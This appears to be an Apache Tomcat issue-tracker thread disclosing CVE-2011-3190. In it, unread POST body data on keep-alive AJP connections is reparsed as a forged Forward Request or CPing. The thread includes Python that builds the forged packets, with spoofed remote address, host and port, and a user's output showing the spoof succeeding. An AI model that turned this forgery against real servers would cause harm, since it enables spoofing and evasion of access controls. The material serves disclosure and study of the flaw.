Created attachment 27416 [details]
ajp CPing packet forgery example

Because the AJP "Data" packet has no "CodeType" and Tomcat adopts a lazy-reading strategy for reading the AJP "Data" packet (i.e., if you don't invoke request.getParameter("XXX"), Tomcat doesn't read the POST request "Data" packet), the current "Data" packet is kept in the socket input stream. The connection is keep-alive, so the AJP BIO/NIO processor reads the next packet, which this time is the "Data" packet. If the first byte of the "Data" packet's length is 0x02 (Code Type of Forward Request Packet) or 0x0A (Code Type of CPing Packet), then Tomcat will be in trouble. Please see the attachments.

First example: ajp CPing packet forgery example
Second example: ajp Forward-Request packet forgery
Created attachment 27417 [details]
ajp Forward-Request packet forgery

Second example: ajp Forward-Request packet forgery
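The mechanism the report above describes can be modelled without a Tomcat instance. The following is an added example, not the reporter's attachments and not Tomcat's code: it builds AJP13 packets per the public protocol layout (magic 0x12 0x34, 2-byte payload length, payload; a Forward Request payload starts with prefix code 0x02, a CPing payload is the single byte 0x0A, and a request-body "Data" payload has no prefix, only a 2-byte chunk length followed by the chunk). A toy processor loop then shows what happens when the servlet never reads the body: the Data packet is left in the stream and its first byte is dispatched as a message code. A chunk of length 0x02MM (MM being a method code) is parsed as a second Forward Request whose remote address, server name and port the client chose; a chunk of length 0x0A00 is answered as a CPing. The `fixed=True` path models the corrective behaviour (swallow unread body bytes before reading the next message) and is an assumption of this example, not a description of the actual patch. The hostnames, addresses and the `process`/`forge_body_as_forward_request` helpers are constructed for the demonstration.

```python
import struct

AJP_MAGIC = b"\x12\x34"
JK_FORWARD_REQUEST = 0x02   # web server -> container: Forward Request prefix
JK_CPING = 0x0A             # web server -> container: CPing prefix
METHOD_POST = 3             # AJP13 method code for POST
HDR_CONTENT_LENGTH = 0xA008 # AJP13 coded header name for Content-Length


def ajp_string(s: str) -> bytes:
    """AJP13 string: 2-byte big-endian length, bytes, NUL terminator."""
    b = s.encode()
    return struct.pack(">H", len(b)) + b + b"\x00"


def packet(payload: bytes) -> bytes:
    """Web-server->container packet: magic, 2-byte payload length, payload."""
    return AJP_MAGIC + struct.pack(">H", len(payload)) + payload


def forward_request_body(method: int, uri: str, remote_addr: str,
                         server_name: str, port: int, content_length: int) -> bytes:
    """Everything after the 0x02 prefix of a Forward Request (one header, no attributes)."""
    body = bytes([method])
    body += ajp_string("HTTP/1.1") + ajp_string(uri)
    body += ajp_string(remote_addr) + ajp_string("")          # remote_host left empty
    body += ajp_string(server_name) + struct.pack(">H", port) + b"\x00"  # port, is_ssl
    body += struct.pack(">H", 1)                               # num_headers
    body += struct.pack(">H", HDR_CONTENT_LENGTH) + ajp_string(str(content_length))
    body += b"\xFF"                                            # request terminator
    return body


def forward_request(**kw) -> bytes:
    return packet(bytes([JK_FORWARD_REQUEST]) + forward_request_body(**kw))


def data_packet(chunk: bytes) -> bytes:
    """Request-body packet: NO prefix code, just 2-byte chunk length + chunk."""
    return packet(struct.pack(">H", len(chunk)) + chunk)


def forge_body_as_forward_request(method: int, **kw) -> bytes:
    """Constructed attack chunk: its length is 0x02MM, so read as a fresh message the
    length bytes become prefix 0x02 + method MM and the chunk is a Forward Request."""
    inner = forward_request_body(method, **kw)[1:]   # drop method; the len low byte is it
    target_len = (JK_FORWARD_REQUEST << 8) | method  # 0x0203 == 515 for POST
    assert len(inner) <= target_len, "forged request too long for the length trick"
    return inner + b"\x00" * (target_len - len(inner))  # padding after 0xFF is ignored


def parse_forward_request(payload: bytes) -> dict:
    """Minimal Forward Request parser (fields needed for the demo only)."""
    pos = 2  # skip prefix code and method byte

    def rd_str() -> str:
        nonlocal pos
        (n,) = struct.unpack(">H", payload[pos:pos + 2])
        s = payload[pos + 2:pos + 2 + n].decode()
        pos += 2 + n + 1
        return s

    req = {"method": payload[1], "protocol": rd_str(), "uri": rd_str(),
           "remote_addr": rd_str(), "remote_host": rd_str(), "server_name": rd_str()}
    (req["port"],) = struct.unpack(">H", payload[pos:pos + 2])
    pos += 3  # port + is_ssl byte
    (num_headers,) = struct.unpack(">H", payload[pos:pos + 2])
    pos += 2
    req["content_length"] = 0
    for _ in range(num_headers):
        if payload[pos] == 0xA0:                       # coded header name
            name = "content-length" if payload[pos + 1] == 0x08 else "other"
            pos += 2
        else:
            name = rd_str().lower()
        value = rd_str()
        if name == "content-length":
            req["content_length"] = int(value)
    return req


def read_packet(stream: bytes, pos: int):
    assert stream[pos:pos + 2] == AJP_MAGIC, "bad AJP magic"
    (n,) = struct.unpack(">H", stream[pos + 2:pos + 4])
    return stream[pos + 4:pos + 4 + n], pos + 4 + n


def process(stream: bytes, servlet_reads_body: bool, fixed: bool) -> list:
    """Toy AJP processor loop over one keep-alive connection; returns events seen.
    fixed=False: the unread Data packet stays in the stream and is dispatched by its
    first byte.  fixed=True (assumed corrective behaviour): unread body is swallowed."""
    events, pos = [], 0
    while pos < len(stream):
        payload, pos = read_packet(stream, pos)
        code = payload[0]
        if code == JK_CPING:
            events.append("CPING->CPONG")
        elif code == JK_FORWARD_REQUEST:
            req = parse_forward_request(payload)
            events.append(("REQUEST", req["remote_addr"], req["server_name"], req["port"]))
            remaining = req["content_length"]
            if servlet_reads_body or fixed:
                while remaining > 0 and pos < len(stream):   # consume body chunks
                    body, pos = read_packet(stream, pos)
                    (chunk_len,) = struct.unpack(">H", body[:2])
                    remaining -= chunk_len
        else:
            events.append(("UNKNOWN", code))
    return events


def demo() -> dict:
    """Constructed streams: a real POST from 10.0.0.5 followed by one Data packet."""
    real = dict(uri="/examples/servlets/servlet/HelloWorldExample", remote_addr="10.0.0.5",
                server_name="intranet.example", port=8080)
    forged = forge_body_as_forward_request(METHOD_POST, remote_addr="1.2.3.4",
                                           server_name="my.evil-site.com", port=999,
                                           uri=real["uri"], content_length=0)
    fwd_stream = forward_request(method=METHOD_POST, content_length=len(forged), **real) + data_packet(forged)
    ping_chunk = b"A" * ((JK_CPING << 8) | 0x00)   # 2560 bytes -> length bytes 0x0A 0x00
    ping_stream = forward_request(method=METHOD_POST, content_length=len(ping_chunk), **real) + data_packet(ping_chunk)
    return {"forward_vulnerable": process(fwd_stream, False, False),
            "forward_fixed": process(fwd_stream, False, True),
            "cping_vulnerable": process(ping_stream, False, False),
            "cping_fixed": process(ping_stream, False, True)}


if __name__ == "__main__":
    for name, events in demo().items():
        print(name, events)
```

In the vulnerable path the second event carries the client-supplied 1.2.3.4 / my.evil-site.com / 999, which is the shape of the output Ed reports later in this thread; with `fixed=True` the body chunk is consumed as body and only the genuine request is seen.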
This issue has been allocated CVE-2011-3190.

The Tomcat security team strongly discourages the reporting of potential security vulnerabilities via public channels such as this issue tracker. Potential security vulnerabilities should be reported privately to security@tomcat.apache.org.

This issue has been fixed in trunk, 7.0.x, 6.0.x and 5.5.x and will be included in 7.0.21, 6.0.34 and 5.5.34 onwards.
Hi there,

I was testing this out to see if my site was vulnerable and got the following results. I'm not sure, looking at the code comments in ForwardRequestForgeryExample.java, if the output below means it's vulnerable and what exactly that exploited. Could you help me out a bit please?

Thanks,
Ed.

    C:>java -cp . ForwardRequestForgeryExample
    Sending AJP Forward-Request Packet...
    End

    $ tail -f catalina.out
    Invoke HelloWorldExample.doPost method:
    -------------------------------------------
    Host: my.evil-site.com
    RemoteAddr: 1.2.3.4
    LocalPort: 999
    woo: I am here
Bugzilla is not a support forum. Please use the users mailing list.
Sorry about that. Will do.